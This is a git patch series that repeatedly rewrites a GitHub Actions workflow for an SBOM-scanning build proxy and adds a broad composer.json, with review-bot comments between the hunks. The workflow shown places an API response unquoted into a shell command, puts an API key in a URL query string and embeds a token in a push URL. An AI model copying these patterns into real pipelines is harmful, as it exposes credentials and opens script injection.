"sax": "^1.4.1", + "schema-utils": "^4.3.0", + "semver": "^7.7.1", + "send": "^1.1.0", + "setprototypeof": "^1.2.0", + "sha1": "^1.1.1", + "shebang-command": "^2.0.0", + "shebang-regex": "^4.0.0", + "signal-exit": "^4.1.0", + "slash": "^5.1.0", + "slice-ansi": "^7.1.0", + "source-map": "^0.7.4", + "source-map-support": "^0.5.21", + "stats-lite": "^2.2.0", + "statuses": "^2.0.1", + "string-width": "^7.2.0", + "string_decoder": "^1.3.0", + "strip-ansi": "^7.1.0", + "strip-bom": "^5.0.0", + "strip-json-comments": "^5.0.1", + "style-loader": "^4.0.0", + "styled-components": "^6.1.15", + "superagent": "^10.1.1", + "supports-color": "^10.0.0", + "swagger-ui-express": "^5.0.1", + "swig": "^1.4.2", + "tapable": "^2.2.1", + "to-fast-properties": "^4.0.0", + "to-regex-range": "^5.0.1", + "toidentifier": "^1.0.1", + "tr46": "^5.0.0", + "tracium": "^0.2.1", + "ts-jest": "^29.2.6", + "ts-loader": "^9.5.2", + "ts-node": "^10.9.2", + "tslib": "^2.8.1", + "type-fest": "^4.36.0", + "typescript": "^5.8.2", + "underscore": "^1.13.7", + "universalify": "^2.0.1", + "uri-js": "^4.4.1", + "url-loader": "^4.1.1", + "util-deprecate": "^1.0.2", + "uuid": "^11.1.0", + "vue": "^3.5.13", + "web-vitals": "^4.2.4", + "webidl-conversions": "^7.0.0", + "webpack": "^5.98.0", + "webpack-cli": "^6.0.1", + "whatwg-fetch": "^3.6.20", + "whatwg-url": "^14.1.1", + "which": "^5.0.0", + "winston": "^3.17.0", + "wrap-ansi": "^9.0.0", + "wrappy": "^1.0.2", + "write-file-atomic": "^6.0.0", + "ws": "^8.18.1", + "ws-non-native": "^0.4.31", + "xml2js": "^0.6.2", + "xtend": "^4.0.2", + "y18n": "^5.0.8", + "yallist": "^5.0.0", + "yargs": "^17.7.2", + "yargs-parser": "^21.1.1", + "yup": "^1.6.1", + "zod": "^3.24.2", + "zone.js": "^0.15.0" } } From edf06682caa17f11278b5447de166e481ccfe845 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:06:38 +0545 Subject: [PATCH 28/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index ba0d8cf..f925632 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -12,7 +12,7 @@ permissions: packages: read env: - API_URL: https://app.dev.invisirisk.com + API_URL: https://app.stage.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -69,7 +69,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.dev.invisirisk.com/ + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 92850641565e66e4655bd2ebb988fbfc940ead6e Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:09:26 +0545 Subject: [PATCH 29/89] Update main.yml --- .github/workflows/main.yml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..799311a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,10 +1,7 @@ name: Build NPM Package on: - push: - branches: [ main ] - pull_request: - branches: [ main ] + workflow_dispatch: permissions: checks: write From 797baac1b6ac0334cd988f6a64f44cd25269ceb5 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:13:50 +0545 Subject: [PATCH 30/89] Update main.yml From b3124cfa4751fcbb9353073737b6debf282a1b07 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:15:58 +0545 Subject: [PATCH 31/89] Update main.yml --- .github/workflows/main.yml | 71 +++++++------------------------------- 1 file changed, 12 insertions(+), 59 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 799311a..e112e03 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
@@ -1,58 +1,11 @@ -name: Build NPM Package +name: Build and Test with Proxy on: - workflow_dispatch: - -permissions: - checks: write - contents: write - packages: read - -env: - API_URL: https://app.stage.invisirisk.com + push: + branches: + - main jobs: - create_scan_in_IR_Portal: - runs-on: ubuntu-latest - outputs: - scan_id: ${{ steps.parseResponse.outputs.scan_id }} - steps: - - name: Initiating SBOM Scan - id: createScan - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/scan' - method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - - name: Parse Response - id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - - ecr_details: - runs-on: ubuntu-latest - outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} - steps: - - name: Fetching VB Token - id: fetchECRDetails - uses: fjogeleit/http-request-action@v1.15.1 - with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - - name: Decoding VB Token - id: parseToken - run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details - id: ecr_details - run: | - echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" - echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" - echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" - echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] 
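Review bot: Removing the top-level `permissions:` block leaves `GITHUB_TOKEN` with whatever default the repository or organisation grants, while `start_proxy_and_build` still pushes commits with it; an explicit block with only `contents: write` on that job keeps the scope stated in the file. The hunk also deletes the `create_scan_in_IR_Portal` and `ecr_details` jobs but keeps `needs: [create_scan_in_IR_Portal, ecr_details]`, so the remaining job depends on jobs that no longer exist. The `pse` service credentials read `needs.ecr_details.outputs.*` and would have no source either. The body of `start_proxy_and_build` continues outside this hunk.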
@@ -70,49 +23,49 @@ jobs: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine - options: --cap-add=NET_ADMIN + options: --cap-add=NET_ADMIN --dns=8.8.8.8 strategy: matrix: node-version: [18.x] steps: + # Step 1: Print Scan ID (for debug purposes) - name: Print Scan ID env: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} run: echo $SCAN_ID + # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) - name: PSE Action uses: invisirisk/pse-action@v1.0.8 with: github-token: ${{ secrets.GITHUB_TOKEN }} - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + # Step 3: Checkout the repository code - name: Checkout code uses: actions/checkout@v3 with: fetch-depth: 0 token: ${{ secrets.GITHUB_TOKEN }} - - name: Configure Git - run: | - git config --global --add safe.directory "${GITHUB_WORKSPACE}" - git config --global user.name "GitHub Actions" - git config --global user.email "github-actions[bot]@users.noreply.github.com" - + # Step 4: Setup Node.js - name: Setup Node.js uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} + # Step 5: Install dependencies - name: Install dependencies run: | npm install npm ci + # Step 6: Build and test the application - name: Build and test run: | npm run build --if-present npm test + # Step 7: Commit and push changes (if there are any) - name: Commit and push changes run: | if [[ -n "$(git status --porcelain)" ]]; then From 552b1d97a6534a4a54c8ac102edcb5b7d2e0d947 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:19:43 +0545 Subject: [PATCH 32/89] Update main.yml --- .github/workflows/main.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index e112e03..aa43b4b 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
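Review bot: The `Configure Git` step is removed while `Commit and push changes` stays, so `git commit` now runs in the container without `user.name`/`user.email` and without the `safe.directory` entry that step added. The three lines can move to the top of the push step: `git config --global --add safe.directory "${GITHUB_WORKSPACE}"`, `git config --global user.name "GitHub Actions"` and `git config --global user.email "github-actions[bot]@users.noreply.github.com"`. `--dns=8.8.8.8` hard-codes an external resolver for the build container; if the `pse` service is meant to observe the build's network activity, confirm that name resolution is not expected to go through it as well. `Print Scan ID` still reads `needs.create_scan_in_IR_Portal.outputs.scan_id`, which the first hunk of this commit removed.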
@@ -1,9 +1,12 @@ name: Build and Test with Proxy on: - push: - branches: - - main + workflow_dispatch: + inputs: + example_input: + description: 'An example input' + required: false + default: 'default_value' jobs: start_proxy_and_build: From 829a11c37bdeadb0fd5ecd4d4ca06b98388dbf99 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:21:10 +0545 Subject: [PATCH 33/89] Update main.yml --- .github/workflows/main.yml | 48 +++++++++++++++++++++++++++++++++++--- 1 file changed, 45 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index aa43b4b..7e284f1 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
@@ -9,9 +9,51 @@ on: default: 'default_value' jobs: + setup_scan: + runs-on: ubuntu-latest + steps: + - name: Initiating SBOM Scan + id: createScan + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/scan' + method: 'POST' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + + - name: Parse Response + id: parseResponse + run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + + ecr_details: + runs-on: ubuntu-latest + outputs: + ecr_username: ${{steps.ecr_details.outputs.username}} + ecr_token: ${{steps.ecr_details.outputs.token}} + ecr_region: ${{steps.ecr_details.outputs.region}} + ecr_id: ${{steps.ecr_details.outputs.registry_id}} + steps: + - name: Fetching VB Token + id: fetchECRDetails + uses: fjogeleit/http-request-action@v1.15.1 + with: + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' + + - name: Decoding VB Token + id: parseToken + run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" + + - name: ECR Details + id: ecr_details + run: | + echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" + echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" + echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" + echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest - needs: [create_scan_in_IR_Portal, ecr_details] + needs: [setup_scan, ecr_details] # This job depends on the above two jobs services: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest 
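Review bot: In the re-added `Decoding VB Token` step, `${{ fromJson(steps.fetchECRDetails.outputs.response).data }}` is substituted into the script before the shell runs and is unquoted, so whatever the registry endpoint returns is parsed as shell text. Passing it through the environment keeps it as data: add `env:` with `ENCODED_TOKEN: ${{ fromJson(steps.fetchECRDetails.outputs.response).data }}` and use `run: echo "DECODED_TOKEN=$(printf '%s' "$ENCODED_TOKEN" | base64 -d)" >> "$GITHUB_OUTPUT"`. The decoded registry password then travels through step and job outputs as an ordinary value that log redaction does not know about, so those outputs should not be echoed in debug steps. `setup_scan` declares no `outputs:` and, as far as this commit shows, the workflow no longer defines `env.API_URL`, so `needs.setup_scan.outputs.scan_id` will be empty and both request URLs lose their host.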
@@ -34,7 +76,7 @@ jobs: # Step 1: Print Scan ID (for debug purposes) - name: Print Scan ID env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + SCAN_ID: ${{ needs.setup_scan.outputs.scan_id }} run: echo $SCAN_ID # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) @@ -77,4 +119,4 @@ jobs: git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} else echo "No changes to commit" - fi + From e19d41b555bcc4275b0ed8ad22330fe4722a9549 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:27:51 +0545 Subject: [PATCH 34/89] Update main.yml --- .github/workflows/main.yml | 110 +++++++++++++------------------------ 1 file changed, 39 insertions(+), 71 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7e284f1..3732e6c 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,16 +1,19 @@ -name: Build and Test with Proxy - +name: Build NPM Package on: - workflow_dispatch: - inputs: - example_input: - description: 'An example input' - required: false - default: 'default_value' + workflow_dispatch: + +permissions: + checks: write + contents: read + packages: read +env: + API_URL: https://app.veribom.com jobs: - setup_scan: + create_scan_in_IR_Portal: runs-on: ubuntu-latest + outputs: + scan_id: ${{ steps.parseResponse.outputs.scan_id }} steps: - name: Initiating SBOM Scan id: createScan @@ -18,12 +21,10 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - + data: '{"api_key": "${{secrets.VB_API_KEY_PROD}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" - ecr_details: runs-on: ubuntu-latest outputs: 
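Review bot: In the `@@ -77,4 +119,4 @@` hunk, removing the closing `fi` leaves the `if` block of `Commit and push changes` unterminated, so the shell rejects the script with a syntax error and the step fails even when there is nothing to commit. The last line of the `run:` block should remain `fi`, after the `echo "No changes to commit"` branch. The `if` itself opens outside this hunk.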
@@ -36,13 +37,11 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' - + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_PROD}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" - - name: ECR Details id: ecr_details run: | 
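Review bot: The production key is sent as `?api_key=${{secrets.VB_API_KEY_PROD}}` in the query string of the GET request, and URLs are routinely written to access logs and proxy logs along the way. If the registry endpoint accepts it, move the key out of the URL into a request header through the action's `customHeaders` input, or into a POST body as the scan step does; whether the API supports either is not visible from this diff. The `ecr_details` job continues outside this hunk.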
@@ -50,73 +49,42 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" - + start_proxy_and_build: runs-on: ubuntu-latest - needs: [setup_scan, ecr_details] # This job depends on the above two jobs + needs: [create_scan_in_IR_Portal, ecr_details] services: pse: image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_PROD}} + INVISIRISK_PORTAL: https://app.veribom.com + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine - options: --cap-add=NET_ADMIN --dns=8.8.8.8 + options: --cap-add=NET_ADMIN strategy: matrix: node-version: [18.x] steps: - # Step 1: Print Scan ID (for debug purposes) - - name: Print Scan ID - env: - SCAN_ID: ${{ needs.setup_scan.outputs.scan_id }} - run: echo $SCAN_ID - - # Step 2: Use PSE Action (Make sure to provide the correct GitHub token) - - name: PSE Action - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} - - # Step 3: Checkout the repository code - - name: Checkout code - uses: actions/checkout@v3 - with: - fetch-depth: 0 - token: ${{ secrets.GITHUB_TOKEN }} - - # Step 4: Setup Node.js - - name: Setup Node.js - uses: actions/setup-node@v3 - with: - 
node-version: ${{ matrix.node-version }} - - # Step 5: Install dependencies - - name: Install dependencies - run: | - npm install - npm ci - - # Step 6: Build and test the application - - name: Build and test - run: | - npm run build --if-present - npm test - - # Step 7: Commit and push changes (if there are any) - - name: Commit and push changes - run: | - if [[ -n "$(git status --porcelain)" ]]; then - git add . - git commit -m "chore: automated build and test updates [skip ci]" - git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} - else - echo "No changes to commit" - + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - run: npm install -g pnpm + - run: pnpm install From 3912ff6cc1b86d99882729b9e806724b9f863c85 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:29:20 +0545 Subject: [PATCH 35/89] Update main.yml --- .github/workflows/main.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 3732e6c..aa72ff3 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -7,7 +7,7 @@ permissions: contents: read packages: read env: - API_URL: https://app.veribom.com + API_URL: https://app.stage.veribom.com jobs: create_scan_in_IR_Portal: @@ -62,8 +62,8 @@ jobs: env: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_PROD}} - INVISIRISK_PORTAL: https://app.veribom.com + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.veribom.com GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From b77fb250b9e2152fb97e104e35f51508ec6559f4 Mon Sep 17 00:00:00 2001 
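Review bot: `npm install -g pnpm` at the end of the new step list installs whatever pnpm release is current when the job runs, so the package manager executing inside the monitored build changes without any change to this file. Pin it, e.g. `npm install -g pnpm@<pinned-version>`, and, assuming a `pnpm-lock.yaml` is committed, make the lockfile requirement explicit with `pnpm install --frozen-lockfile`. The rewritten steps also lost their `name:` keys, which makes the run log harder to follow. The same two commands return in the revert hunk of PATCH 42.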
From: ir-paras-oli Date: Tue, 4 Mar 2025 12:31:53 +0545 Subject: [PATCH 36/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index aa72ff3..c19fda8 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -21,7 +21,7 @@ jobs: with: url: '${{env.API_URL}}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY_PROD}}"}' + data: '{"api_key": "${{secrets.VB_API_KEY}}"}' - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" @@ -37,7 +37,7 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_PROD}}' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' method: 'GET' - name: Decoding VB Token id: parseToken From bc181a7a659d3ecf95ffe5d0ce52631aab702ed3 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 12:32:17 +0545 Subject: [PATCH 37/89] Update main.yml --- .github/workflows/main.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index c19fda8..0635c62 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -55,7 +55,7 @@ jobs: needs: [create_scan_in_IR_Portal, ecr_details] services: pse: - image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:latest + image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} From cba14b6c9eccc5394fc207f679e7a3cee786f20e Mon Sep 17 00:00:00 2001 
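Review bot: Both `pse-proxy:latest` and the new `pse-proxy:dev-test` are mutable tags, so the service container that runs beside the build can change between runs without a change to this file. Reference the image by digest, `282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy@sha256:<digest>`, and record the intended tag in a comment next to it. The `services` block continues outside this hunk.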
From: ir-paras-oli Date: Tue, 4 Mar 2025 14:03:36 +0545 Subject: [PATCH 38/89] Create composer.json --- composer.json | 111 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 composer.json diff --git a/composer.json b/composer.json new file mode 100644 index 0000000..7868e26 --- /dev/null +++ b/composer.json 
@@ -0,0 +1,111 @@
+{
+ "require": {
+ "monolog/monolog": "^2.0",
+ "guzzlehttp/guzzle": "^7.0",
+ "symfony/symfony": "^6.0",
+ "laravel/framework": "^10.0",
+ "phpunit/phpunit": "^9.0",
+ "doctrine/orm": "^2.0",
+ "fzaninotto/faker": "^1.9",
+ "vlucas/phpdotenv": "^5.0",
+ "swiftmailer/swiftmailer": "^6.0",
+ "twig/twig": "^3.0",
+ "psr/log": "^1.0",
+ "sebastian/version": "^3.0",
+ "sebastian/global-state": "^5.0",
+ "sebastian/exporter": "^4.0",
+ "sebastian/environment": "^5.0",
+ "sebastian/diff": "^4.0",
+ "sebastian/comparator": "^4.0",
+ "phpdocumentor/reflection-common": "^2.0",
+ "phpdocumentor/type-resolver": "^1.0",
+ "phpdocumentor/reflection-docblock": "^5.0",
+ "webmozart/assert": "^1.0",
+ "phpoption/phpoption": "^1.0",
+ "nikic/php-parser": "^4.0",
+ "mockery/mockery": "^1.0",
+ "hamcrest/hamcrest-php": "^2.0",
+ "dnoegel/php-xdg-base-dir": "^0.1",
+ "composer/semver": "^3.0",
+ "composer/installers": "^2.0",
+ "composer/ca-bundle": "^2.0",
+ "composer/composer": "^2.0",
+ "classpreloader/classpreloader": "^4.0",
+ "brianium/paratest": "^6.0",
+ "brick/math": "^0.9",
+ "aws/aws-sdk-php": "^3.0",
+ "asm89/stack-cors": "^2.0",
+ "ramsey/uuid": "^4.0",
+ "ralouphie/getallheaders": "^3.0",
+ "psy/psysh": "^0.10",
+ "phpseclib/phpseclib": "^3.0",
+ "phpspec/prophecy": "^1.0",
+ "phar-io/version": "^3.0",
+ "phar-io/manifest": "^2.0",
+ "paragonie/random_compat": "^9.0",
+ "myclabs/deep-copy": "^1.0",
+ "league/mime-type-detection": "^1.0",
+ "league/flysystem": "^3.0",
+ "league/commonmark": "^2.0",
+ "lcobucci/jwt": "^4.0",
+ "laravel/tinker": "^2.0",
+ "symfony/http-foundation": "^6.0",
+ "symfony/console": "^6.0",
+ "symfony/routing": "^6.0",
+ "symfony/event-dispatcher": "^6.0",
+ "symfony/http-kernel": "^6.0",
+ "symfony/finder": "^6.0",
+ "symfony/filesystem": "^6.0",
+ "symfony/process": "^6.0",
+ "symfony/var-dumper": "^6.0",
+ "symfony/translation": "^6.0",
+ "symfony/validator": "^6.0",
+ "symfony/serializer": "^6.0",
+ "symfony/yaml": "^6.0",
+ "symfony/security-core": "^6.0",
+ "symfony/security-http": "^6.0",
+ "symfony/security-csrf": "^6.0",
+ "symfony/security-guard": "^6.0",
+ "symfony/security-bundle": "^6.0",
+ "symfony/monolog-bridge": "^6.0",
+ "symfony/twig-bridge": "^6.0",
+ "symfony/twig-bundle": "^6.0",
+ "symfony/asset": "^6.0",
+ "symfony/expression-language": "^6.0",
+ "symfony/cache": "^6.0",
+ "symfony/lock": "^6.0",
+ "symfony/messenger": "^6.0",
+ "symfony/mailer": "^6.0",
+ "symfony/mercure": "^6.0",
+ "symfony/web-link": "^6.0",
+ "symfony/dom-crawler": "^6.0",
+ "symfony/browser-kit": "^6.0",
+ "symfony/css-selector": "^6.0",
+ "symfony/phpunit-bridge": "^6.0",
+ "symfony/panther": "^2.0",
+ "symfony/string": "^6.0",
+ "symfony/uid": "^6.0",
+ "symfony/rate-limiter": "^6.0",
+ "symfony/scheduler": "^6.0",
+ "symfony/remote-event": "^6.0",
+ "symfony/webhook": "^6.0",
+ "symfony/notifier": "^6.0",
+ "symfony/password-hasher": "^6.0",
+ "symfony/clock": "^6.0",
+ "symfony/doctrine-bridge": "^6.0",
+ "symfony/doctrine-messenger": "^6.0",
+ "symfony/orm-pack": "^2.0",
+ "symfony/webpack-encore-bundle": "^1.0",
+ "symfony/ux": "^2.0",
+ "symfony/ux-turbo": "^2.0",
+ "symfony/ux-twig-component": "^2.0",
+ "symfony/ux-live-component": "^2.0",
+ "symfony/ux-dropzone": "^2.0",
+ "symfony/ux-chartjs": "^2.0",
+ "symfony/ux-cropperjs": "^2.0",
+ "symfony/ux-lazy-image": "^2.0",
+ "symfony/ux-notify": "^2.0",
+ "symfony/ux-toggle-password": "^2.0",
+ "symfony/ux-autocomplete": "^2.0"
+ }
+}
From a75fe0d8c6ce8b590cfa9e56e9f2521b2a8090e4 Mon Sep 17 00:00:00 2001
From: ir-paras-oli
Date: Tue, 4 Mar 2025 14:04:02 +0545
Subject: [PATCH 39/89] Create mainphp.yml
---
 .github/workflows/mainphp.yml | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 .github/workflows/mainphp.yml
diff --git a/.github/workflows/mainphp.yml b/.github/workflows/mainphp.yml
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/.github/workflows/mainphp.yml
@@ -0,0 +1 @@
+
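Review bot: Test and debugging tools (`phpunit/phpunit`, `mockery/mockery`, `phpspec/prophecy`, `brianium/paratest`, `psy/psysh`) are listed under `require`, so they are installed in every production tree; they belong under `require-dev`. `fzaninotto/faker` and `swiftmailer/swiftmailer` are abandoned upstream and no longer receive fixes. The commit adds no `composer.lock` (the diffstat shows one file), so `composer install` resolves all of these caret ranges afresh on each run. If the list is deliberately broad as scanner test input, a `description` field saying so would make that clear to the next reader.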
From 200227dbcf37f4d81e0c61f479b07e9cb990b344 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 14:05:28 +0545 Subject: [PATCH 40/89] Update main.yml --- .github/workflows/main.yml | 75 ++++++++++++++++++++------------------ 1 file changed, 39 insertions(+), 36 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0635c62..31e135a 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -1,6 +1,6 @@ -name: Build NPM Package +name: Build PHP Package on: - workflow_dispatch: + workflow_dispatch: permissions: checks: write 
@@ -19,37 +19,38 @@ jobs: id: createScan uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/scan' + url: '${{ env.API_URL }}/utilityapi/v1/scan' method: 'POST' - data: '{"api_key": "${{secrets.VB_API_KEY}}"}' + data: '{"api_key": "${{ secrets.VB_API_KEY }}"}' - name: Parse Response id: parseResponse - run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + run: echo "scan_id=${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: - ecr_username: ${{steps.ecr_details.outputs.username}} - ecr_token: ${{steps.ecr_details.outputs.token}} - ecr_region: ${{steps.ecr_details.outputs.region}} - ecr_id: ${{steps.ecr_details.outputs.registry_id}} + ecr_username: ${{ steps.ecr_details.outputs.username }} + ecr_token: ${{ steps.ecr_details.outputs.token }} + ecr_region: ${{ steps.ecr_details.outputs.region }} + ecr_id: ${{ steps.ecr_details.outputs.registry_id }} steps: - name: Fetching VB Token id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: 